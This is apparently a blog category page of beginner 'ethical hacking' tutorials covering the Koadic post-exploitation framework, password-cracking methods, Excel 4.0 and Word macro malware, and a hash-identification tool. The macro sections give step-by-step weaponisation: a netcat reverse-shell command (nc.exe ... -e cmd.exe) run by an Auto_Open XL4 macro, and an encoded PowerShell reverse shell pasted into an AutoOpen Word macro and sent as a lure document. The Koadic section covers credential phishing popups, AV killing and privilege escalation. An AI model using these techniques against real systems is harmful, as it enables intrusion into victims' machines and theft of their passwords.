Category: Hacking

Posted on by

Beginners guide to Koadic

Hello, aspiring ethical hackers. In our previous blogpost, you learnt about Windows POST exploitation. In this article, you will learn about Koadic, a Windows POST exploitation toolkit.

Koadic is similar to other pen testing tools like Empire and meterpreter in its functioning but performs most of its operations using Windows Script host (JScript/VBScript). It also has the capability to serve payloads in memory and also has encrypted communication over SSL and TLS.

Let’s see how this tool works. For this, we will be using Kali Linux as attacker machine as Koadic is available by default in its repositories. As target system, we will be using Windows 10 as part of the virtual hacking lab (just replace Metasploitable 2 with Windows 10).

Koadic can be started with the command shown below.

koadic

Here’s how the interface of koadic looks.

There are three important things you need to understand about koadic. They are,

1. Stagers,
2. Zombies and
3. Implants.

Stagers are the methods through which you gain access to the target system. You can view all stagers of Koadic by using command shown below.

use stager/js/ <TAB> <TAB>

For the purpose of this article, let’s select mshta stager. This stager creates a HTA attack to gain initial access. To view the information about this stager, you can use “info” command.

All the options are automatically set (including Attacker IP address). If you want to change any option, you can do that using the “set” command (Set SRVHOST <attacker IP> etc). After setting all the options, you can execute the module using “run” command.

It creates an URL with a command. This command needs to be executed on the target system. Just because it is an URL, don’t make the mistake of executing in a browser as shown below.

You will get a zombie but it will time out immediately as shown below.

Open a CMD (remember, you are in Post-exploitation stage after already gaining access) and execute the command as shown below.

You will get a LIVE zombie as shown below.

It’s time to define a Zombie in koadic. Zombies in koadic are like a shell back or a session (similar to meterpreter in Metasploit). You can view all the zombies you got using “zombies” command.

You can interact with a specific zombie using command as shown below.

zombies <id of the zombie>

Next come implants. Implants in koadic is a name for all Post-exploitation operations or operation modules. You can view all the implants just like you viewed stagers.

use implant <TAB> <TAB>

They are divided into sections based on the purpose they fulfill. For example, let’s see all gather modules. Gather implants help in gathering information about the target system.

For example, let’s see the “enum_users” implant. This implant as its name implies enumerates all users on the target Windows system.

All you have to do to use the implant is to set the ID of the Zombie and execute it.

As you can see, there is only one user on the target system. His name is ADMIN.

Manage implants help us to enable features that help in managing target system. These features include remote desktop, killing AV or executing a command on the target system.

Let’s use the “exec_cmd” implant that executes a command we want on the target system.

By default, it is set to execute the command “hostname” on the target system and display its result. As you can see, we got the hostname displayed successfully.

The “phish” implants do what they do. They phish the target users. For example. let’s use it to capture passwords.

When executed, it pops up a window on the target system asking for his/her password as shown below.

If the target user falls for it, his password is captured. This implant can be used to get any password with a bit of social engineering of course.

The “fun” section of implants has implants related to having fun like sending a voice message to target user, thunderstruck etc.

The inject implants inject code into processes.

The ‘util’ implants are useful for uploading and downloading files to and from the target system.

Koadic has implants that are used for establishing persistence.

Similarly, there are even implants that help in privilege escalation.

The zombie we got at the beginning of this blogpost is a low privileged zombie. Let’s use fod helper implant to get a zombie with elevated privileges on the target system.

Set the payload as ‘0’ and set the zombie ID.

After all the options are set, execute the implant as shown below.

We have a new zombie (id 4). Let’s check its privileges.

As you can see, we now have an elevated session. That’s all about Koadic – Windows post exploitation framework. Learn how to use Nishang and PowerSploit for Windows post-exploitation.

Posted on by

Password cracking for beginners

Hello aspiring Ethical hackers. In this article, you will learn what is password cracking and various types of password cracking. In Ethical hacking, password cracking is recovering passwords from data that has been stored in or transmitted by a computer system. Hackers use password cracking to grab credentials which can be helpful in further exploiting of the system. There are various password cracking techniques. They are,

1. Shoulder Surfing
2. Password Guessing
3. Dictionary Attack
4. Brute Force Attack
5. Rainbow Table Attack  
6. Phishing
7. Sniffing
8. Malware

Let’s learn in detail of each attack.

1. Shoulder Surfing

Shoulder Surfing is one of the easiest password cracking techniques that doesn’t require use of any technology. In shoulder surfing, the hacker stands behind (or sits behind, position is not really important) the victim when he is entering his credentials and captures the credentials by simple observation. As you can see, this is the easiest way to capture credentials of the target.

2. Password Guessing

Another password cracking technique that doesn’t require any technology. In this technique, hacker tries to guess the password of the victim using his own mind. You may be surprised but this technique yielded me results at least 20% of the total attempts made.

3. Dictionary Attack

In a dictionary attack, a hacker uses a dictionary to crack passwords. A dictionary or wordlist has a huge list of words (possible passwords), each one of which is tried as a password. In Kali Linux, the dictionary or wordlists are present in /usr/share/dirb/wordlists directory.

4. Brute Force Attack

In a brute force attack, hackers use every possible criteria or password to crack the credentials. A brute force attack may be slow but it will eventually crack the password. A brute force attack works by calculating the hash function of every password string it has and compares it with one on the target system or victim.

5. Rainbow Table Attack

To understand Rainbow Table Attack, you need to first understand what is a Rainbow Table. A Rainbow Table is a database that contains huge list of plaintext passwords and their precompiled hashes. Unlike a Brute Force attack, Rainbow table attack bypasses calculation of a hash for every password string as it already has a pre compiled list of hashes.

6. Phishing

Phishing is one of the easiest methods to crack passwords. You have already learnt about phishing in our previous blogposts.

7. Sniffing

Sniffing or Man In The Middle (MITM) attack can also be used to crack passwords while they are on transit in a network.  Learn more about sniffing here.

8. Malware

Malware is another way hackers capture credentials of their victims. Once hackers gain initial access to a system, they install malware which allows hackers to not only perform further malicious actions but also capture user credentials from the target system.

Posted on by

Excel Macros for beginners

Hello aspiring ethical hackers. In our previous article, you have learnt what a Macro is and how to create a malicious VBA macro. In this article, you will learn about Excel 4.0 Macros and how to create one. Excel 4.0 Macros or XLM were introduced by Microsoft in 1992 when Excel 4.0 was launched as a default macro language and they serve the same functions as VBA macros in Word.  

As Excel 4.0 Macros are used for legitimate purposes, they can’t just be disabled by many. Further increasing the effectiveness of these macros, there is not yet a good detection method to detect malicious XL4 macros. Apart from this, they are very simple create but also very powerful just like Visual Basic Application (VBA) Macros.

 Now let’s see how to create an Excel 4.0 Macro. On a Windows system, we open Excel in Microsoft Office or the Office Suite. We are doing this on Microsoft Office 2007. You should see an Excel Workbook opened as shown below.

Right click on “Sheet 1” and select the “Insert” option as shown below.

In the newly opened window, select MS Excel 4.0 Macro and click on “OK”.

excel 4.0 macros

This will change the name of “Sheet 1” to “Macro 1” as shown below.

Save the file with the name you like. We have named it “evil_macro” for easy identification. While saving it, save it as a Macro Enabled Excel Workbook.

Once the file is saved, it’s time to create the macro. In the first column, which is named A1, we insert the command given below.

=EXEC(“cmd.exe”)

You may not realize, but you have already created your first XL4 macro. In the second column, i.e A2, insert another command =HALT(). This is to ensure that the macro you created does not face an error while running. It’s time to test your macro. Right Click on the first column, and click on “Run” as shown below.

Most probably, this will open a new window as shown below. Click on “Run”.

Doing this opens a Windows CMD window as shown below.

Voila, we successfully created a Excel 4.0 Macro and even executed it. If you have noticed it, we opened a Windows CMD by inserting a simple code. Now, let’s make a few changes to the “evil_macro” file. Move the =HALT() command to A3 cell and enter command given below in cell A2. Save the file.

=ALERT(“You have been hacked”)

Right click on Cell A1 and select “Run” again just like you did before.

Now, we can see that apart from Windows CMD window being opened, another window popped up with the message “You have been hacked”. We have just performed two operations with macros in one file. Not just cmd.exe, we can open other programs like Notepad and Calc.exe using the “=exec” function.

Now, let’s try something a bit advanced like spawning a reverse shell now. Download the Netcat Windows executable. Open Notepad and insert the following command into it.

<Path to Netcat Windows executable> <target IP> <target port> -e cmd.exe.

On our system, this command looks like this.                    

C:\Users\nspadm\Desktop\nc.exe 192.168.36.189 4444 -e cmd.exe

The -e option specifies which command to execute after netcat makes a successful connection. Now, save this file as a CMD file.  This can be done by saving the file in double quotes. For example, “shell.cmd” and keeping the file type as all files.

Now, in your evil_macro file, change the =EXEC function to execute the shell.cmd file you just now created as shown below.

Save the file. Before executing the macro, start a Netcat listener on the listener IP address you specified.

Now, when you execute the macro, you should get a successful shell as shown below.

This is all fine but nobody will open an Excel file and execute some suspicious looking code in it. We need the code to run automatically as soon as the user opens the Excel file. To do this, Click on A1 cell of your “evil_macro” file and rename it to “Auto_Open” as shown below.

Save the changes and close the file. Start the netcat listener again. Now, just open the evil_macro file and you should see the successful spawning of reverse shell again. That’s all about Excel 4.0 Macros for now.

Posted on by

Malicious Macro’s : What, Why and How

Hello aspiring Ethical Hackers. In this article, you will learn about Malicious Macros also known as Macro Malware or Macro Virus. In computer science, a Macro is a set of commands grouped together as a single command. This is used to run some tasks automatically. In Word, Macros are used to automate frequently used tasks.
           Hackers have been using Macros since a long time as a means to gain initial access to target networks by injecting malicious code into macros. These macros all called malicious macros or macro malware or macro virus. Let’s see how to create a malicious macro.
             For this we will be using a tool that is here. In Kali, clone this tool as shown below.

Navigate into the cloned directory.

Inside that directory, there will be two python scripts: “newpayloadgeneration.py” and ‘payload.py’. Run the script ‘newpayloadgeneration.py’ giving the Attacker IP and port as options. This script generates a Powershell script for reverse shell. Obviously, the IP and port should be of that system on which the listener is running to receive the reverse shell.

Copy the generated encoded string. Open the file ‘payload.py’ and paste the encoded string in the highlighted place.

Once pasted, save the file ‘payload.py’ to preserve the changes. Now, execute the ‘payload.py’ script.

The code for malicious macro is ready. Now let’s create a Macro document. For this tutorial, we are using MS Office 2007 to create it. Open a new Word document, go to View tab and click on Macros (as highlighted below).

malicious macro

Click on “view macros”.

In the new window that opens, click on “create” and give any name you prefer to that macro (We named it test, obviously).

Now, we create the code for macro. It starts with “Sub AutoOpen(). “Sub” stands for Subroutine in macro. It is a small program within the Visual Basic editor. Setting AutoOpen() executes the macro automatically whenever the document is opened. In the subroutine test(), we paste the malicious code we created earlier as shown below.

Then we save this file. This file is sent to the target users. In Real World hacking attacks, since this is the lure document, some bells and whistles are added to convince users to open the document and enable macros. We start the Netcat listener on the attacker machine. When the target user opens this file, we get a security warning saying that macros have been disabled. This is a security feature by Microsoft to protect user from malicious macros. Let’s enable macros for this tutorial. click on options and enable macros as shown below.

As soon as we do this, a Powershell window opens (remember that a we created a Powershell reverse shell)

and we get a incoming reverse shell on our listener as shown below.

This is how malicious macros work to give attackers initial access.

Posted on by

Name-That-Hash: A tool to identify hashes

Hello aspiring Ethical hackers. In this article, you will learn about a new tool named Name That Hash. Name That Hash is a hash identifying tool that can identify over 300 types including MD5 and SHA256. The other features of this tool include displaying summaries for the hashes identified, colored output and displaying in the order of their popularity etc. This tool can be installed from the repository of Kali as shown below.

Once this tool is installed, it can be started using command nth. To test a single hash, we can use “nth” with option “-t” as shown below. Let’s first give a MD5 hash.

nth -t <hash>

name that hash

Just like hashid and hash-identifier, this tool also got it right but it is giving us some additional information like where the hash is actually used. For example, Md5 is used in Linux shadow files. What about SHA-1 hash?

It got this right too. Next, let’s give it a LM hash.

It put this in the Least likely section. Next, let’s give it a NTLM hash.

It failed to get spot on NTLM too. Just like its predecessors, it correctly detected the SHA-512 and SHA-256 hashes.

The good thing about name-that-hash is that instead of being blank, it gives us more information about actually where the hash is used. This can be useful when you grab a collection of hashes from a target network. You can easily decide which hashes to crack and which not to crack.         
If you have more number of hashes, giving it one by one can be cumbersome. Luckily, you can give them all at once by saving these hashes in a text file as shown below.

and using “-f” option to specify the file.

nth -f <path to the file that has saved hashes>

The output which is not shown here is same as above.

Name-That-Hash is only designed to identify hashes unlike the other two but if you have a base64 encoded string, it can be decoded by nth using the “-b64” option.

nth -b64 -t <base64 encoded string>

It correctly decoded it as “hackercool” All the above are also encrypted hashes of the text “hackercool”.  Suppose you want the result to only display the most likely result, you can get this by using the “-a” option as shown below.

nth -a -t <hash>

If you observe the above images, you can see the banner of name-that-hash occupying lot of space. Just like me if this is putting you off, you can view result without banner using the “–no-banner” option. 

nth –no-banner <hash>

Once go to the image above the above image, the one where we used the “-a” option. Once, carefully observe the result. It correctly detected the hash as SHA-512. Next to it, you can see the text “HC 1700 JtR: raw-sha512”.                    This is HashCat (HC stands for HashCat) and John (JtR stands for John The Ripper) information being displayed by the tool because the next thing you will do after identifying the hash is to crack it using Hashcat or John. This requires what you need to put into these tools to crack it. For example, let’s take a simpler hash.

John The Ripper says its raw-md5. We need to just supply this format as shown below in JTR to crack this.

Similarly, the HC number given is “0”. Let’s supply it as shown below in HashCat.

However, if you are an experienced ethical hacker with too much details hurting your ego, you can just view the result without the information of John The Ripper using “–no-john” option.

nth –no-john -t <hash>

This is the difference.

You can do the same with HashCat information using “–no-hashcat” information.

nth –no-hashcat -t <hash>

The difference can be seen below.

That was all about this tool.